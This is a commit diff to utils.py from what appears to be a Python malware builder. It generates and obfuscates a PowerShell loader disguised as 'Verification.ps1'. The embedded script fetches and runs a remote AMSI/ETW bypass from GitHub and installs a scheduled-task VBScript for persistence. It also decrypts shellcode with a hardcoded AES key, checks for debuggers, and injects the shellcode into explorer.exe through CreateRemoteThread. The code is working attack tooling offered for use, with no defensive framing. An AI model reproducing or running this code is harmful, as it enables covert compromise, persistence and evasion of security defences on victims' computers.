Update utils.py

utils.py

@@ -40,14 +40,14 @@ def generate_random_string(length=8):
 
 def obfuscate_powershell_script(ps1_path):
     try:
-        obfuscated_file = ps1_path.replace(".ps1", "_OBF.ps1")
-        cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}" "{ps1_path}" "{obfuscated_file}"'
-        process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
+        cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}"'
+        process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
+        process.stdin.write(f"{ps1_path}\n")
+        process.stdin.flush()
         stdout, stderr = process.communicate()
         if process.returncode != 0:
             raise Exception(f"Error obfuscating PowerShell script: {stderr}")
-        if not os.path.exists(obfuscated_file):
-            raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_file}")
+        obfuscated_file = ps1_path.replace(".ps1", "_OBF.ps1")
         return obfuscated_file
     except Exception as e:
         raise Exception(f"Obfuscation failed: {str(e)}")
@@ -203,33 +203,24 @@ def process_request(request):
         ps1_content = f'''
 # Download and execute the script from the provided URL
 iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
-
 # Run the Invoke-NullAMSI command
 Invoke-NullAMSI
-
 Invoke-NullAMSI -etw
-
 # Define the content of the VBScript
 $vbsContent = @'
 Set objShell = CreateObject("WScript.Shell")
 objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
 '@
-
 # Define the file path for the .vbs file in the desired location
 $vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
-
 # Write the content to the .vbs file
 $vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
-
 Write-Host "VBScript file created at: $vbsFilePath"
-
 $Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
 $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
 Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
-
 # Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
 $keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
-
 # Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
 if ($keyBytes.Length -gt 16) {{
     $keyBytes = $keyBytes[0..15]  # Trim the key to 16 bytes if it's longer
@@ -238,7 +229,6 @@ elseif ($keyBytes.Length -lt 16) {{
     # If the key is too short, pad it with zeros to make it 16 bytes
     $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
 }}
-
 # Function to download the encrypted binary from the server
 function Download-EncryptedShellcode {{
     param([string]$url)
@@ -246,34 +236,26 @@ function Download-EncryptedShellcode {{
     $response = Invoke-WebRequest -Uri $url -UseBasicParsing
     return $response.Content
 }}
-
 # Read the encrypted shellcode from a local binary file
 $encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
-
 # Create an AES encryption object
 $aes = [System.Security.Cryptography.Aes]::Create()
-
 # Set the decryption key and initialization vector (IV)
 $aes.Key = $keyBytes
 $aes.IV = $keyBytes[0..15]  # Use the first 16 bytes of the key for the IV
-
 # Create a memory stream to hold the decrypted data
 $memoryStream = New-Object System.IO.MemoryStream
 $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
-
 # Decrypt the encrypted data into the memory stream
 $cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
 $cryptoStream.Close()
-
 # Get the decrypted shellcode
 $buf = $memoryStream.ToArray()
-
 # Anti-debugging mechanism
 function IsDebuggerPresent {{
     $IsDebuggerPresentCode = @"
     using System;
     using System.Runtime.InteropServices;
-
     public class DebugHelper {{
         [DllImport(\\"kernel32.dll\\")]
         public static extern bool IsDebuggerPresent();
@@ -282,57 +264,44 @@ function IsDebuggerPresent {{
     $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
     return $debugHelper::IsDebuggerPresent()
 }}
-
 if (IsDebuggerPresent) {{
     Write-Host "Debugger detected. Exiting."
     exit
 }}
-
 # Inject shellcode into a target process (example: explorer.exe)
 $Win32APICode = @"
 using System;
 using System.Runtime.InteropServices;
-
 public class Win32API {{
     [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
     public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
-
     [DllImport(\\"kernel32.dll\\", SetLastError = true)]
     public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
-
     [DllImport(\\"kernel32.dll\\", SetLastError = true)]
     public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
-
     [DllImport(\\"kernel32.dll\\", SetLastError = true)]
     public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
-
     [DllImport(\\"kernel32.dll\\", SetLastError = true)]
     [return: MarshalAs(UnmanagedType.Bool)]
     public static extern bool CloseHandle(IntPtr hObject);
 }}
 "@
 $win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
-
 # Target process (explorer.exe) injection
 $targetProcess = Get-Process explorer | Select-Object -First 1
 $processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
-
 # Allocate memory in the target process
 $size = 0x1000
 if ($buf.Length -gt $size) {{ $size = $buf.Length }}
 $remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
-
 # Write the shellcode into the allocated memory
 $bytesWritten = [IntPtr]::Zero
 $win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
-
 # Create a remote thread to execute the shellcode
 $threadId = [IntPtr]::Zero
 $win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
-
 # Close the process handle
 $win32api::CloseHandle($processHandle)
-
 Write-Host "Shellcode injection completed successfully."
 '''
         ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
@@ -342,10 +311,6 @@ Write-Host "Shellcode injection completed successfully."
         # Obfuscate the PowerShell script
         obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
 
-        # Verify that the obfuscated file exists before renaming
-        if not os.path.exists(obfuscated_ps1_path):
-            raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_ps1_path}")
-
         # Rename the obfuscated file to Verification.ps1
         verification_ps1_path = os.path.join(temp_dir, "Verification.ps1")
         os.rename(obfuscated_ps1_path, verification_ps1_path)